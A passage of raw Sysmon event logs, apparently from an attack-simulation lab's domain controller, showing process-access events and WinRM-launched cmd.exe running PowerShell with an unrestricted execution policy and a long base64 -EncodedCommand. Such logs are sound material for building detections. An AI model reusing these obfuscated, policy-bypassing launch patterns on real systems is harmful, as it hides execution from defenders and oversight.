YSTEM32\ntdll.dll+6e871 10341000x80000000000000002911Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:42:09.948{5D479F2C-169F-5F84-0500-000000007F01}648796C:\Windows\system32\csrss.exe{5D479F2C-16E1-5F84-8E00-000000007F01}4972C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x80000000000000002910Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:42:09.948{5D479F2C-16E1-5F84-8D00-000000007F01}50085004C:\Windows\system32\cmd.exe{5D479F2C-16E1-5F84-8E00-000000007F01}4972C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 154100x80000000000000002909Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:42:09.959{5D479F2C-16E1-5F84-8E00-000000007F01}4972C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEPowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA=C:\Users\Administrator\ATTACKRANGE\Administrator{5D479F2C-16E1-5F84-1D69-050000000000}0x5691d0HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{5D479F2C-16E1-5F84-8D00-000000007F01}5008C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA= 10341000x80000000000000002908Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:42:09.948{5D479F2C-169F-5F84-0B00-000000007F01}86496C:\Windows\system32\lsass.exe{5D479F2C-16A1-5F84-1400-000000007F01}1308C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002907Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:42:09.948{5D479F2C-16E1-5F84-8C00-000000007F01}50885100C:\Windows\system32\conhost.exe{5D479F2C-16E1-5F84-8D00-000000007F01}5008C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002906Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:42:09.948{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002905Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:42:09.948{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002904Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:42:09.948{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002903Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:42:09.948{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002902Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:42:09.948{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002901Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:42:09.948{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002900Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:42:09.948{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002899Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:42:09.948{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002898Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:42:09.948{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002897Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:42:09.948{5D479F2C-169F-5F84-0500-000000007F01}6482424C:\Windows\system32\csrss.exe{5D479F2C-16E1-5F84-8D00-000000007F01}5008C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x80000000000000002896Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:42:09.948{5D479F2C-16E1-5F84-8B00-000000007F01}50765012C:\Windows\system32\WinrsHost.exe{5D479F2C-16E1-5F84-8D00-000000007F01}5008C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\WinrsHost.exe+2c94|C:\Windows\system32\WinrsHost.exe+2eb1|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+7d09|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+b42b|C:\Windows\System32\combase.dll+53b8c|C:\Windows\System32\combase.dll+53842|C:\Windows\System32\combase.dll+51968|C:\Windows\System32\combase.dll+4fedd|C:\Windows\System32\combase.dll+4f5bf|C:\Windows\System32\combase.dll+6da09|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5982e|C:\Windows\System32\RPCRT4.dll+39257|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb 154100x80000000000000002895Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:42:09.954{5D479F2C-16E1-5F84-8D00-000000007F01}5008C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEE